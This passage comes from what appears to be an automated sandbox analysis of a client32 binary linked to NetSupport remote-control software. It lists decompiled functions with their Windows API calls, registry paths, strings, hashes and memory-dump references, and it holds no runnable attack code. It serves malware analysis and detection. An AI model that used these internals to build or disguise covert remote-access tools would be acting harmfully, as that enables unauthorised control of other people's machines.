                                                                                                                                                                                • Opcode Fuzzy Hash: 68dfa1b3a978c61f53ecc40af1327f290213095a8926f233bdb06c51b79a4962
                                                                                                                                                                                • Instruction Fuzzy Hash: 2161D571B84325ABE711CF90CC85F69F774E784B29F104129F625AB2C4EBB56940CB84
                                                                                                                                                                                Function 110F7300 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 137libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll,2520CF5D,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110F732D
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7372
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73C3
                                                                                                                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73FD
                                                                                                                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
                                                                                                                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressErrorLastLibraryProc$Free$Load
                                                                                                                                                                                • String ID: WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                                                                                                                • API String ID: 2188719708-2019804778
                                                                                                                                                                                • Opcode ID: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                                                                                                                • Instruction ID: 4e6ae02227e90de241cbe6e1e3770e4d50810e342ffe13a4e1f679076b39a632
                                                                                                                                                                                • Opcode Fuzzy Hash: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                                                                                                                • Instruction Fuzzy Hash: 49511371D4121AEFDB14DFD9D9C5AAEFBF5FB48300F51846AE829E3600DB34A9018B61
                                                                                                                                                                                Function 1103F520 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 126windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                                                                                                • GetDlgItem.USER32(?,00000472), ref: 1103F557
                                                                                                                                                                                  • Part of subcall function 11160450: SetPropA.USER32(00000000,00000000), ref: 1116046E
                                                                                                                                                                                  • Part of subcall function 11160450: SetWindowLongA.USER32(00000000,000000FC,1115FE60), ref: 1116047F
                                                                                                                                                                                • wsprintfA.USER32 ref: 1103F5D1
                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000), ref: 1103F5F6
                                                                                                                                                                                • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103F604
                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103F663
                                                                                                                                                                                • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103F692
                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 1103F696
                                                                                                                                                                                  • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 1114580D
                                                                                                                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,11110200), ref: 1114584E
                                                                                                                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Item$FolderMenuPath$BeepEnableFileLongMessageModuleNameObjectPropRectShowSystemTextwsprintf
                                                                                                                                                                                • String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                • API String ID: 1300213680-78349004
                                                                                                                                                                                • Opcode ID: ba26c9b44418edad1198b7b544d0bb829f2fd1f0ff462ea531e43d6bd8fbdf8b
                                                                                                                                                                                • Instruction ID: 6f07d7162ed8c172429d77206b5c6f615c65d6256772802cbf9fe3e1e633a07a
                                                                                                                                                                                • Opcode Fuzzy Hash: ba26c9b44418edad1198b7b544d0bb829f2fd1f0ff462ea531e43d6bd8fbdf8b
                                                                                                                                                                                • Instruction Fuzzy Hash: 0641EE757403197FD720DBA4CC86FDAF3A4AB48B08F104568F3666B5C0DAB0B980CB55
                                                                                                                                                                                Function 11059919 Relevance: 20.0, APIs: 13, Instructions: 483windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 11059C29
                                                                                                                                                                                • CombineRgn.GDI32(?,?,00000000,00000002), ref: 11059C3A
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11059C4B
                                                                                                                                                                                • PostMessageA.USER32(00010446,00000800,00000000,00000000), ref: 11059CB6
                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 11059CED
                                                                                                                                                                                  • Part of subcall function 110585A0: GetTickCount.KERNEL32 ref: 11058616
                                                                                                                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C), ref: 1109599E
                                                                                                                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D), ref: 110959A7
                                                                                                                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E), ref: 110959AE
                                                                                                                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(00000000), ref: 110959B7
                                                                                                                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F), ref: 110959BD
                                                                                                                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(00000001), ref: 110959C5
                                                                                                                                                                                • GetDC.USER32(00000000), ref: 11059CBE
                                                                                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 11059CCB
                                                                                                                                                                                • SetPixel.GDI32(00000000,00000000,00000000,00000000), ref: 11059CD7
                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 11059CE0
                                                                                                                                                                                • GetSystemMetrics.USER32(0000004C), ref: 11059D2B
                                                                                                                                                                                • GetSystemMetrics.USER32(0000004D), ref: 11059D31
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11059D9D
                                                                                                                                                                                • _free.LIBCMT ref: 11059E20
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MetricsSystem$CountPixelTick$CombineCreateCursorDeleteMessageObjectPostRectRelease_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4025550384-0
                                                                                                                                                                                • Opcode ID: 39772e85b346ff2fac3f2e96c5421b44fde4937e6c3a20d181bcb98fd7cccd47
                                                                                                                                                                                • Instruction ID: b3301e80f26c362509d5481da3d4053feaa1ca98b0064de2953376fc6ec30e5f
                                                                                                                                                                                • Opcode Fuzzy Hash: 39772e85b346ff2fac3f2e96c5421b44fde4937e6c3a20d181bcb98fd7cccd47
                                                                                                                                                                                • Instruction Fuzzy Hash: 42E1CE75E003198FEB95CF64CC85BEABBF4FF46304F1401AED95A9A281EB34A945CB50
                                                                                                                                                                                Function 1105F200 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 368COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • wsprintfA.USER32 ref: 1105F251
                                                                                                                                                                                • wsprintfA.USER32 ref: 1105F265
                                                                                                                                                                                  • Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,1100AB48,80000002,?,80000002,00000000,?,?,?,80000002,?,110EDCBC,?), ref: 110ED59B
                                                                                                                                                                                  • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EDB88,?,?,00020019,2520CF5D), ref: 110ED53C
                                                                                                                                                                                • wsprintfA.USER32 ref: 1105F5D6
                                                                                                                                                                                  • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,2520CF5D), ref: 110ED1CB
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                  • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen_strrchr
                                                                                                                                                                                • String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                                • API String ID: 273891520-33395967
                                                                                                                                                                                • Opcode ID: 59cb4ffafa813e98c409ae2f1657f50038946432318fc414ee8822337e6ffe62
                                                                                                                                                                                • Instruction ID: 955d7069f5cd37ed2049fe2a08fe06563fb7c7f4ee9c814884e1c508eb43a074
                                                                                                                                                                                • Opcode Fuzzy Hash: 59cb4ffafa813e98c409ae2f1657f50038946432318fc414ee8822337e6ffe62
                                                                                                                                                                                • Instruction Fuzzy Hash: D2E16079E0122DABDB56DB55CC94FEDB7B8AF58758F4040C8E50977280EA306B84CF61
                                                                                                                                                                                Function 1100D330 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                                • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                                                                                                                • API String ID: 2111968516-2092292787
                                                                                                                                                                                • Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                                                                                                                • Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
                                                                                                                                                                                • Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                                                                                                                • Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5
                                                                                                                                                                                Function 1106F7E0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,00000000), ref: 1106F91F
                                                                                                                                                                                • DeleteCriticalSection.KERNEL32(?), ref: 1106F932
                                                                                                                                                                                • DeleteCriticalSection.KERNEL32(?), ref: 1106F93B
                                                                                                                                                                                • DeleteCriticalSection.KERNEL32(2520CF5D), ref: 1106F941
                                                                                                                                                                                • DeleteCriticalSection.KERNEL32(?), ref: 1106F947
                                                                                                                                                                                • _free.LIBCMT ref: 1106F9E6
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalDeleteSection$CloseErrorExitHandleLastMessageProcess_freewsprintf
                                                                                                                                                                                • String ID: ..\ctl32\Connect.cpp$idata->RMap.empty ()$idata->selcount == 0$idata->tr == NULL || idata->tr == (TRANSPORT *) -1 || idata->dead$status=%d, event=%x, cmd=%d, type=%d
                                                                                                                                                                                • API String ID: 2775598068-2048592468
                                                                                                                                                                                • Opcode ID: 5601ea85b828ad820df7f10a44534faa9b87cb131994c34b28bc51bbf7237509
                                                                                                                                                                                • Instruction ID: 0987413bd6dc35210384d9bc4d816cd1e0534a6ba93ebff993e7fe3d64728355
                                                                                                                                                                                • Opcode Fuzzy Hash: 5601ea85b828ad820df7f10a44534faa9b87cb131994c34b28bc51bbf7237509
                                                                                                                                                                                • Instruction Fuzzy Hash: 3C61BD75E00A52AFD704DFA4C880FAAFBE8AF49318F00469DE5159B291D770F944CBA1
                                                                                                                                                                                Function 1101F0D0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 116windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D
                                                                                                                                                                                  • Part of subcall function 110CCE60: GetWindowRect.USER32(110CEFF5,?), ref: 110CCE7C
                                                                                                                                                                                  • Part of subcall function 110CCE60: SetRectEmpty.USER32(?), ref: 110CCE88
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 1101F16C
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 1101F178
                                                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 1101F187
                                                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 1101F19F
                                                                                                                                                                                • GetMenuItemCount.USER32 ref: 1101F1A7
                                                                                                                                                                                • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F20C
                                                                                                                                                                                • __strdup.LIBCMT ref: 1101F221
                                                                                                                                                                                • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1101F279
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect$CountEmptyParametersSystemWindow__strdup
                                                                                                                                                                                • String ID: 0$MakeOwnerDraw
                                                                                                                                                                                • API String ID: 277963199-1190305232
                                                                                                                                                                                • Opcode ID: b5d77bf9320b7cdf66dfe56842c7c46e0960c9967f7ea7157d4bc8110fe51e5e
                                                                                                                                                                                • Instruction ID: cad075490b8b101532292c9a84c7126ab9bfd0db94d612dc2b0baac2de7b47d0
                                                                                                                                                                                • Opcode Fuzzy Hash: b5d77bf9320b7cdf66dfe56842c7c46e0960c9967f7ea7157d4bc8110fe51e5e
                                                                                                                                                                                • Instruction Fuzzy Hash: 19417E71D012399BDB64DFA4CC89BD9FBB8BB09708F0001D9E508A7284DBB46A84CF94
                                                                                                                                                                                Function 11069590 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 96sleepCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 110695BD
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 110695D3
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 110695E9
                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 1106961D
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11069621
                                                                                                                                                                                • wsprintfA.USER32 ref: 11069651
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 110696A4
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 110696A7
                                                                                                                                                                                Strings
